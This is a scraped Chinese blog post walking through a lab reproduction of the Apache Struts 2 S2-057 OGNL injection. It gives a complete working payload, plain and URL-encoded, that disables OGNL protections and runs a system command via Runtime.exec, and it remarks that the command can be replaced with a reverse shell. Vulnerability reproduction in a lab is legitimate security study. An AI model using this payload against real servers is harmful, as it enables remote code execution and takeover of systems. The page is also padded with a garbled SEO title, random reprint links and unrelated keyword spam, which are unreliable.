当前位置: 首页 > wzjs >正文

e语言可以做网站吗wordpress 是什麽

e语言可以做网站吗,wordpress 是什麽,合肥网络营销公司,微软雅黑做网站漏洞原理:S2-057是由于 Struts 2框架对重定向URL处理不当导致的OGNL注入漏洞。攻击者通过构造特殊参数,可以在服务器上执行任意代码。漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时…

漏洞原理:

S2-057是由于 Struts 2框架对重定向URL处理不当导致的OGNL注入漏洞。攻击者通过构造特殊参数,可以在服务器上执行任意代码。漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。

靶场搭建:

可以根据我上篇文章去搭建,因为懒所以我就不在这多罗嗦了。直接复现。

漏洞复现:

先打开容器:http://localhost:8080/strusts2-showcase

然后我们先试一下下面的代码

/${(20+20)}/actionChain1.action # ()里面随便两数做运算就可以

填在上面路径的后面 

我们回车了一下,发下在url里面执行运算

 

所以说{()}里面的内容执行了,然后我们用下面的代码 

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}/actionChain1.action

 url编码后:

%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

这时候我们bp抓包去看信息

我们可以对exec()里面的命令进行替换,也可以写入反弹shell

 


文章转载自:

http://cpS0PjIs.dzwrt.cn
http://RlwiGLY5.dzwrt.cn
http://0sWKS7z2.dzwrt.cn
http://979Y5S9R.dzwrt.cn
http://RRC31RRT.dzwrt.cn
http://AfvMmD6h.dzwrt.cn
http://C65tQFsr.dzwrt.cn
http://bcO8lVJN.dzwrt.cn
http://f2cePLQ4.dzwrt.cn
http://PxdfUahr.dzwrt.cn
http://UZfYBUzQ.dzwrt.cn
http://O3gk201F.dzwrt.cn
http://uNmBZ2O5.dzwrt.cn
http://58hCZtbd.dzwrt.cn
http://VUxljuAW.dzwrt.cn
http://3Gmy66bA.dzwrt.cn
http://ukp4MRBL.dzwrt.cn
http://jqWgqowY.dzwrt.cn
http://T637L5Jl.dzwrt.cn
http://MyaJmv9G.dzwrt.cn
http://prfK48en.dzwrt.cn
http://31OclWCh.dzwrt.cn
http://g3F1HsDO.dzwrt.cn
http://awgkWcVT.dzwrt.cn
http://k5s558HK.dzwrt.cn
http://fWfHOjJD.dzwrt.cn
http://D2RZBV1c.dzwrt.cn
http://w8lbDlhA.dzwrt.cn
http://kXv02wMJ.dzwrt.cn
http://LsXhV7rb.dzwrt.cn
http://www.dtcms.com/wzjs/703803.html

相关文章:

  • 网站资源库建设报价公司做企业网站
  • 做公司网站需要什么手续塔城市建设局网站
  • 大朗网站建设公司鲜花网站设计
  • 西安seo优化淘宝客seo推广教程
  • 手机验证登录网站开发西昌网站建设
  • 如何给一个网站做压测网站打开速度慢跟什么有关系
  • 如何编写网站seo中国是什么
  • 闽清网站建设没有网站可以做百度推广吗
  • 网站有关于我们的好处哈尔滨网站建设价格低
  • 网站建设费用标准免费外链平台
  • 网站建设推广安徽怎么做网站开发的方案
  • 软件园专业做网站莱芜找工作 招聘附近
  • 如何用wordpress仿站大兴做网站公司
  • 赣州做网站公司网站建站网站域名申请
  • 企业网站建设资金预算表《建设监理》网站
  • 一般网站隐蔽点么么进公众号开发工具下载
  • 数字货币网站开发展示型网站与营销型网站区别
  • 建设公司网站的要点刚上线的网站
  • 域名 做网站和邮箱上海服装集团网站建设
  • 网站底部横条导航代码代码网站模板
  • seo公司优化方案宁波seo深度优化平台有哪些
  • 免费公司网站源码网站开发 例子
  • 如何提高网站的排名成都网站建设 雷
  • vs2005做网站网站的安全性建设
  • 新浪云服务器做网站徐州网站关键词
  • 站长之家关键词挖掘哪个浏览器不屏蔽网站
  • 自己做的网站怎么发到网上百度指数分析数据
  • 网站免费源码下载农业信息网站建设概念
  • 用服务器建立网站今天莱芜大事件新闻最新消息
  • 怎做视频网站番禺网站建设制作